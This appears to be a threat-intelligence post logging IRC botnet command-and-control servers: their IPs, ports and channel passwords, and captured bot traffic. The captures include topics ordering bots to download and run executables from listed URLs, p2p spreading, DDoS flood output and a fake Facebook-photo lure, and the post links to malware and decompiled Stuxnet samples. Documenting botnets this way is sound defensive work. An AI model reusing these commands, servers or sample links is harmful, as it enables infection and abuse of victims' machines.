Remote Host     Port Number
59.61.93.126    81

NICK n[USA|XP]7424992
USER s "" "lol" :s
JOIN #newbin#
JOIN #bin# abc
PONG 422
Now talking in #newbin#
Topic On: [ #newbin# ] [ .dl http://www.freewebtown.com/newlow/im.exe ]
Topic By: [ rm- ]
(rm) !im http://tiny.cc/facebook-photo-18-02-2011

Info about hosting: http://whois.domaintools.com/59.61.93.126
Another malware package
Here are around 34 MB of malware samples (fake antiviruses, password stealers, banking trojans, etc.). Download: http://www.p1nk.me/VtzvTy
dns.googleure.com (botnet hosted in Russian Federation 2x4.ru Network)
dns.googleure.com DNS_TYPE_A 92.241.164.227
92.241.164.227:1234

Nick: n{US|XPa}xvwpyyv
Username: xvwpyyv
Server Pass: null
Joined Channel: #!ngr! with Password ngrBot
Joined Channel: #US
Channel Topic for Channel #!ngr!: ".mod pdef off .s .j -c IT,ITA,ES,ESP,FR,FRA #uz4 .up http://jeanie.ws/new.exe 3c62c54ff04ae4af8262ae4d5e2683c7"
Private Message to Channel #!ngr!: "[d="http://jeanie.ws/new.exe" s="278528 bytes"] Updated bot file "C:\Documents and Settings\Administrator\Application Data\Dekfki.exe""

Info about hosting: http://whois.domaintools.com/92.241.164.227
nice.niceshot.in (botnet hosted in Netherlands Rijndata B.v)
Remote Host     Port Number
46.21.169.42    6567

PASS s1m0n3t4
MODE [SI|USA|00|P|57896] -ix
JOIN #yur# c1rc0dusoleil
PONG Apple.Network
NICK [SI|USA|00|P|57896]
USER XP-0495 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|69385] -ix
JOIN #wal# c1rc0dusoleil
PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_12581.exe @ 96.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|48857]
USER XP-5184 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|48857] -ix
kay.gizliresimler.net (botnet hosted in United States Burlington The Endurance International Group Inc)
Remote Host       Port Number
209.59.221.182    3232

PASS pass
MODE [USA|XP|959443] -ix
JOIN #yah pass
PRIVMSG #yah :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|959443]
USER vsnzefq * 0 :COMPUTERNAME
Now talking in #yah
Topic On: [ #yah ] [ .p2p ]
Topic By: [ wc22 ]

Info about hosting: http://whois.domaintools.com/209.59.221.182
77.79.7.106 (botnet hosted in Lithuania Webhosting Collocation Services)
Remote Host       Port Number
174.37.72.72      80
204.0.5.56        80
216.178.38.224    80
63.135.80.46      80
69.63.181.16      80
77.79.7.106       6663

PASS xxx
MODE NEW-[USA|00|P|01494] -ix
JOIN #!nn! test
PONG irc.priv8net.com
NICK NEW-[USA|00|P|01494]
USER XP-6931 * 0 :COMPUTERNAME
Now talking in #!nn!
Topic On: [ #!nn! ] [ .m.s|.m.e Foto 😀 http://apps.facebook.com/phootosofyour/photo.php?= ]
Topic By: [ wd38 ]
Topic: wd38
74.117.174.101 (botnet hosted in United States Seattle Kwshells Internet Services)
Remote Host       Port Number
74.117.174.101    32321

MODE pLagUe{USA}50784 -ix
JOIN #p#
PONG cbl-101-1.aster.com.pl
PRIVMSG #p# : New PC Infected.

Info about hosting: http://whois.domaintools.com/74.117.174.101
minerva.cdmon.org (botnet hosted in Netherlands Amsterdam As29073 Ecatel Ltd)
NICK {XPUSA288239}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA288239} -ix
JOIN ##spam##
MODE ##spam## -ix
PRIVMSG ##spam## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds
PRIVMSG ##spam## :.::[DDoS]::. Done with flood (0KB/sec).
NICK {XPUSA796543}
MODE {XPUSA796543} -ix
Resolved : [minerva.cdmon.org] To [89.248.172.225]
Now talking in ##security-check##
Topic On: [ ##security-check## ] [ .part ##security-check# ]
205.234.213.231 (botnet hosted in United States Chicago Hostforweb Inc)
Remote Host        Port Number
204.0.5.51         80
63.135.80.224      80
63.135.80.46       80
205.234.213.231    1234

PASS xxx
NICK NEW-[USA|00|P|39876]
USER XP-0115 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|39876] -ix
JOIN #!nn! test
PONG 22
MOTD

Info about hosting: http://whois.domaintools.com/205.234.213.231
Stuxnet decompiled samples
Source here: http://crowdleaks.org/hbgary-wanted-to-suppress-stuxnet-research/
Download: http://11ec4fbd.whackyvidz.com